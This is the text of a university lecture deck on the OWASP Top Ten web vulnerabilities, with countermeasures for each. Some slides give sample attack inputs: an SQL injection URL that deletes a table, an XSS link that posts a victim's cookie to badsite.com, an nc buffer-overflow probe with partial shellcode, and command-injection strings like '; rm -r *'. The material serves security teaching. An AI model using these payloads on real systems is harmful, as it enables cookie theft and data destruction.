Information Networking Security and Assurance LabNational Chung Cheng University

工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories

The Ten Most CriticalWeb Application Security

Vulnerabilities

Ryan J.W Chen

Information Networking Security and Assurance LabNational Chung Cheng University

工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories

OWASP Top Ten Vulnerabilities

Outline

A1 Unvalidated Input

A5 Buffer Overflows

A10 Insecure Configuration Management

A2 Broken Access Control

A3 Broken Authentication and Session Management

A4 Cross Site Scripting (XSS) Flaws

A6 Injection Flaws

A7 Improper Error Handling

A8 Insecure Storage

A9 Denial of Service

Information Networking Security and Assurance LabNational Chung Cheng University

工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories

Example Web Application

Browser

Web Server Application Server

Database Server

InternalNetwork

DMZ ProtectedNetwork

Internet

Information Networking Security and Assurance LabNational Chung Cheng University

工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories

Top Ten Vulnerabilities this year & last year

Information Networking Security and Assurance LabNational Chung Cheng University

工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories

A1 Unvalidated Input (1/3)

Attacker can tamper with any part of an HTTP request, including url, querystring, headers, cookies, form fields, and hidden field.

Related Attack A4 Cross site Scripting A5 Buffer Overflows A6 Injection Flaws

Information Networking Security and Assurance LabNational Chung Cheng University

工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories

A1 Unvalidated Input (2/3)

Any malicious user can see the QueryString and modify it!

http://www.yoursite.com/phones/phonelist.cgi?phoneid=34

http://www.yoursite.com/phones/phonelist.cgi?phoneid=34;delete from phones

SELECT name, phone FROM phones WHEREphoneid=34; DELETE FROM phones

Manipulation

What will be done?

Example: (SQL Injection)

Information Networking Security and Assurance LabNational Chung Cheng University

工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories

A1 Unvalidated Input (3/3)

Countermeasures Parameter should be validate before they are used.

Data type Allow character set Minimum and maximum length Whether null is allowed Whether the parameter is require or not Whether duplicates are allowed Numeric range

Information Networking Security and Assurance LabNational Chung Cheng University

工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories

A2 Broken Access Control

Access Control = Authorization

Countermeasures Use access control matrix to define access control rules. Administrative function can use VPN to protect.

Path traversal

File permissions – may allow access to config/password files

Client-side caching Insecure session IDs or keys

Forced browsing past access control checks

Information Networking Security and Assurance LabNational Chung Cheng University

工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories

A3 Broken Authentication and Session Management

Weak authentication

Countermeasures Strong passwords Account List protection Session ID Protection (SSL)

Password-only

Easily guessable usernamesUnencrypted secrets could be sniffed

Trust relationships between hosts

Information Networking Security and Assurance LabNational Chung Cheng University

工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories

A4 Cross Site Scripting (XSS) Flaws

Attacker uses a trust application/company to send malicious code to end-user.

<a href= http://www.insecuresite.com/welcome.asp?name= <FORM action=http://www.badsite.com/data.asp method=post id=“idForm”> <INPUT name=“cookie” type=“hidden”> </FORM> <SCRIPT> idForm.cookie.value=document.cookie; idForm.submit(); </SCRIPT>>here</a> “cookie robbed!!”

Source : Bo

Information Networking Security and Assurance LabNational Chung Cheng University

工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories

A5 Buffer Overflows

Mostly affects web/app servers Goal: crash the target app and get a shell

Countermeasures Keep up with bug reports Periodically scan your website Code reviews

–echo “vrfy `perl –e ‘print “a” x 1000’`” |nc echo “vrfy `perl –e ‘print “a” x 1000’`” |nc www.targetsystem.com 25 25

–char shellcode[] = “\xeb\xlf\x5e\x89\x76\x08…”char shellcode[] = “\xeb\xlf\x5e\x89\x76\x08…”

Replace this with something like this…Replace this with something like this…

Example:

Information Networking Security and Assurance LabNational Chung Cheng University

工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories

A6 Injection Flaws

Allows attacker to relay malicious code through a web application to another system.

Countermeasures Avoid system calls (use libraries instead) Validate input information. Run with limited privileges

Path traversal: “../”

Add more commands: “; rm –r *”

SQL injection: “’ OR 1=1”

Information Networking Security and Assurance LabNational Chung Cheng University

工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories

Helps attacker know how to target the application.

Countermeasures Code review Modify default error pages (404, 401, etc.)

A7 Improper Error Handling

“File not found” vs. “Access denied”

Example:

Information Networking Security and Assurance LabNational Chung Cheng University

工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories

A8 Insecure Storage

Insecure storage of sensitive information.

Countermeasures Use a one-way hash function(SHA-1) instead of storing

encrypted data. Make sure no open vulnerabilities in cryptography.

Improper storage of secrets in memory

Poor randomnessPoor choice of algorithm

Failure to encrypt critical dataInsecure storage of keys, certificates, and passwords

Information Networking Security and Assurance LabNational Chung Cheng University

工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories

A9 Denial of Service

Legitimate users can’t be serviced.

Countermeasures Limit the sources allocated to any user to a bare minimum. Avoid any unnecessary access to databases or other expensive

resource.

Exhaust the system resources

Legitimate account lock out

Information Networking Security and Assurance LabNational Chung Cheng University

工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories

A10 Insecure Configuration Management

Developers ≠ web masters

Countermeasures Configure all security mechanisms. Turn off all unused services. Set up and audit roles, permissions, and accounts. logging and alerts.

Unpatched security flaws in the server software.

Improper file and directory permission.

Default accounts with their default passwords.

Configuration problems: